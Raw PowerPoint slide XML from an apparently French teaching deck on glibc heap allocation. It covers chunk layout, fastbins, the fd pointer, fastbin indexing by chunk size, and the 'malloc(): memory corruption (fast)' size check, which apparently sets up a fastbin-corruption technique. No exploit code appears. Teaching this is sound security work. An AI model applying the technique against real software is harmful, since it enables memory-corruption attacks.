                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74B556CC-DF05-49C3-AD73-3D379F28AE05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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nutshell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7E299B00-0748-4DC4-9DCD-036830256205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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nutshell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028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50821-CAA8-4ED2-9FBC-C1510E9F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0DD3F0-518E-4041-94E6-924EDD280CD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3892800" y="2414072"/>
            <a:ext cx="14688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cake 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41F6C2-072F-4E44-A2FA-575EDA7DADE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5361600" y="2414072"/>
            <a:ext cx="14688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cake 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C84CD7-88B9-4EB4-941F-9D6DDA1BBA98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1631504" y="2418616"/>
            <a:ext cx="14688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5339E4-E5BC-4282-8C52-6314DC5EB8EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1631504" y="2850664"/>
            <a:ext cx="14688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3F3B016-0173-48AE-A2C9-07B3B9A35AD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1631504" y="1916832"/>
            <a:ext cx="146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Fastbins</a:t>
            </a:r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CA55B1-5E4B-4102-8A84-A9028AA86EAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3893192" y="2414072"/>
            <a:ext cx="402608" cy="432048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 err="1"/>
              <a:t>fd</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Connecteur : en angle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9FEDC1F-B97E-452F-82D6-37C5716EF0D8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>
          <a:xfrm flipV="1">
            <a:off x="3100304" y="2630096"/>
            <a:ext cx="792888" cy="4544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7FE758EA-463D-4473-AD91-E2B2CA4A3329}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1631504" y="3501008"/>
            <a:ext cx="5198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cake4 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(x)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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8032F935-CF96-465E-B0A3-F4D8489F2A57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="15" idx="2"/>
            <a:endCxn id="16" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="5783351" y="1157265"/>
            <a:ext cx="436592" cy="3814302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FEC5091-F654-49C1-A1E2-FD4D61E0A17A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7908798" y="3066688"/>
            <a:ext cx="1468800" cy="432048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17" name="Flèche : chevron 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{959F8125-5591-468A-97B4-3BD9C0B01ADC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0" name="Flèche : chevron 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB61E070-3953-4DFA-9CF4-9CECC213C33A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21" name="Flèche : chevron 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F427C94F-358C-44E4-B9A5-1E4696742349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2" name="Flèche : chevron 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{404015B0-9C3F-4F65-BAC9-94A15A089FAA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" name="Flèche : chevron 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{294E40DD-4B31-40CF-B3FF-04583E68FAA2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24" name="Flèche : chevron 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80660008-FB6D-436D-AEC2-E45E9B50AA64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42921877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50821-CAA8-4ED2-9FBC-C1510E9F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0DD3F0-518E-4041-94E6-924EDD280CD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3892800" y="2414072"/>
            <a:ext cx="14688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cake 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41F6C2-072F-4E44-A2FA-575EDA7DADE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5361600" y="2414072"/>
            <a:ext cx="14688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cake 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C84CD7-88B9-4EB4-941F-9D6DDA1BBA98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1631504" y="2418616"/>
            <a:ext cx="1468800" cy="43204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5339E4-E5BC-4282-8C52-6314DC5EB8EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1631504" y="2850664"/>
            <a:ext cx="14688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3F3B016-0173-48AE-A2C9-07B3B9A35AD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1631504" y="1916832"/>
            <a:ext cx="146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Fastbins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FE758EA-463D-4473-AD91-E2B2CA4A3329}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1631504" y="3501008"/>
            <a:ext cx="5198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cake5 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(x)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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8032F935-CF96-465E-B0A3-F4D8489F2A57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="12" idx="3"/>
            <a:endCxn id="10" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3100304" y="2634640"/>
            <a:ext cx="4808494" cy="648072"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 10609"/>
            </a:avLst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71FCAC6-FF14-4FD0-BBB9-DCF1F4270532}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7908798" y="3066688"/>
            <a:ext cx="1468800" cy="432048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4FBD1ADC-F265-4166-BAD3-F0884F596908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5" name="Flèche : chevron 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1362FD05-29B7-4CC5-B1F9-B0EF00AC6B70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16" name="Flèche : chevron 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05ADF4C6-DDCF-4C27-AA4F-30632A9789B0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7" name="Flèche : chevron 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC32409E-3104-4B60-8396-CD06A8653F26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0" name="Flèche : chevron 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCCEDEF8-90BD-4602-9703-CA667831C327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21" name="Flèche : chevron 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7DCEBBE-690C-45FD-BB98-DE8200C03360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28708953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50821-CAA8-4ED2-9FBC-C1510E9F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0DD3F0-518E-4041-94E6-924EDD280CD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3892800" y="2414072"/>
            <a:ext cx="14688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cake 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41F6C2-072F-4E44-A2FA-575EDA7DADE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5361600" y="2414072"/>
            <a:ext cx="14688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cake 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C84CD7-88B9-4EB4-941F-9D6DDA1BBA98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1631504" y="2418616"/>
            <a:ext cx="1468800" cy="43204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5339E4-E5BC-4282-8C52-6314DC5EB8EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1631504" y="2850664"/>
            <a:ext cx="14688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3F3B016-0173-48AE-A2C9-07B3B9A35AD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1631504" y="1916832"/>
            <a:ext cx="146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Fastbins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FE758EA-463D-4473-AD91-E2B2CA4A3329}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1631504" y="3501008"/>
            <a:ext cx="5198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cake6 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(x)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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8032F935-CF96-465E-B0A3-F4D8489F2A57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100304" y="2634640"/>
            <a:ext cx="4795898" cy="650344"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 9166"/>
            </a:avLst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28879CF-7063-4752-92C9-7B3905184F4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7908798" y="3066688"/>
            <a:ext cx="1468800" cy="432048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cake 6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1727EF3-D1DE-4DF4-8D2A-804AFAAE1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874" y="3714760"/>
            <a:ext cx="4237410" cy="2882592"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Flèche : chevron 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3578ED5B-3A82-4E84-B11C-61A8A42C8B31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" name="Flèche : chevron 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A350197-21C4-46D7-8047-B7A3503FBCA9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17" name="Flèche : chevron 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A24887FE-BEC0-4DD2-A4FE-B156D393F095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0" name="Flèche : chevron 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93D4ACC3-C089-4B65-90F6-98DA923C7235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1" name="Flèche : chevron 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2AF7E0E-F30A-4DF9-BD19-E46EF97A9581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22" name="Flèche : chevron 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C96FBEE-2B94-4F99-BAEE-C910EAB58C43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41759164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50821-CAA8-4ED2-9FBC-C1510E9F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 : reality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D5AC7FA-D2C6-49BB-A612-7D163EB2A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072"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1994046" y="1600200"/>
            <a:ext cx="8203907" cy="21156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351EF1A-7442-43FF-B38F-927FB5237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010" y="4077072"/>
            <a:ext cx="6427978" cy="1920391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E35F3BF-ED80-4F9D-B5A8-F82E0F95FA97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="8688288" y="4365104"/>
            <a:ext cx="1296144" cy="4320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FDEDADE5-35D5-438A-9E25-B52F9CDFA81A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10056440" y="465313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index du </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>fastbin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1BEB7AF-1FAE-45D3-9176-DAD046AF49CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="623392" y="3686082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Récupère l’index du </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>fastbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> en fonction de la size du </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> libre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4280D53-4674-4E1D-8EA4-186FDA5FF555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4367808" y="4055414"/>
            <a:ext cx="504056" cy="781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3FC184CA-C8F0-436C-A170-5B4230C74369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Flèche : chevron 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D88AFD9C-C9B4-410A-B711-2EEFBC78010E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13" name="Flèche : chevron 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F18B8705-B9C5-4B56-9EE0-096CA2562762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Flèche : chevron 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{784802C7-1F32-450E-9CD7-FB7C3EE2158E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5" name="Flèche : chevron 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11E85436-EBBB-4923-A43A-D1EE4DCFA704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18" name="Flèche : chevron 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{151C63AB-ABC2-4299-98F5-24359EEB3C72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33123168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50821-CAA8-4ED2-9FBC-C1510E9F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 : reality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C86629-36E7-46F7-9BF7-AF1A170C5E3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3892800" y="2414072"/>
            <a:ext cx="14688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cake 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DBCF62-B775-4466-87E6-7E8513E6A61A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5361600" y="2414072"/>
            <a:ext cx="14688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cake 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FB858B-B6E6-4184-B298-482125A91910}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1631504" y="2418616"/>
            <a:ext cx="1468800" cy="43204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5B63CB-EDC0-4BBF-9701-0A24CFBCB0AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1631504" y="2850664"/>
            <a:ext cx="14688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5613FF8-FF24-4127-B83C-0F58E5815861}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1631504" y="1916832"/>
            <a:ext cx="146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Fastbins</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="28" name="Connecteur : en angle 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51DA6F8E-622C-4673-9F7D-3966B6E9306F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="25" idx="3"/>
            <a:endCxn id="30" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3100304" y="2634640"/>
            <a:ext cx="4730651" cy="1076692"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 10750"/>
            </a:avLst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4313D4E4-7C46-4318-8148-DCB5EAE903CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8407018" y="2996952"/>
            <a:ext cx="1468800" cy="1428760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F70E2A-D1F7-471D-B01E-033CFEE67956}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7830955" y="2996952"/>
            <a:ext cx="576064" cy="1428760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>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>size=0x30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F3EF2FB-DDFB-4927-A791-4A3F5E665C88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533128" y="2414072"/>
            <a:ext cx="1044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0: 0x20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CA318BE-7F67-4791-B6CC-C3621536C3CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533128" y="2913380"/>
            <a:ext cx="1044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1: 0x30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43A7939F-0A11-475F-BCE4-3DED0B67222D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8118987" y="4581128"/>
            <a:ext cx="0" cy="4320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75BBCF7F-4166-4E86-9F2F-65DF4C494089}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6870294" y="5140092"/>
            <a:ext cx="2808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0x30 =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Fastbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> index : 1 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Non égal 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40AE48F4-3CDD-4085-AB27-3847366BB46C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5159896" y="4941168"/>
            <a:ext cx="1584159" cy="792088"/>
          </a:xfrm>
          <a:prstGeom prst="mathNotEqua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1A5F5685-E6BF-4E09-9A57-E3BD846116FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3287688" y="2780928"/>
            <a:ext cx="0" cy="21602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3C1354FF-2A35-4121-BE8A-64A94CF88C2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2711623" y="5152546"/>
            <a:ext cx="194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fastbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> index : 0 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6E74BF87-3BAD-4AF4-BFF7-7A63FC6B624A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2783632" y="593713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+mj-lt"/>
              </a:rPr>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>(): memory corruption (fast) : 0xXXXXXXXXXXX    </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Flèche : chevron 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B9F721B-5241-40E2-BF57-AFA6799B71A9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0" name="Flèche : chevron 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7524A91E-EFFB-4DEF-8E22-3F993F34BA6E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21" name="Flèche : chevron 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D93F58C6-9C37-462F-B177-3B6ACB4F0337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2" name="Flèche : chevron 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DD95906-9BB4-4523-AD6A-22A5301F406E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1" name="Flèche : chevron 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EB339C2-F8E9-4A1C-9755-B2EBAAED2102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32" name="Flèche : chevron 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{290EF3B7-3923-4C9F-A5C2-6281EA62D454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184315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43" grpId="0"/>
      <p:bldP spid="4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50821-CAA8-4ED2-9FBC-C1510E9F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 : reality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C86629-36E7-46F7-9BF7-AF1A170C5E3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3892800" y="2414072"/>
            <a:ext cx="14688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cake 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DBCF62-B775-4466-87E6-7E8513E6A61A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5361600" y="2414072"/>
            <a:ext cx="146880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/>
              <a:t>cake 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FB858B-B6E6-4184-B298-482125A91910}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1631504" y="2418616"/>
            <a:ext cx="1468800" cy="43204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5B63CB-EDC0-4BBF-9701-0A24CFBCB0AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
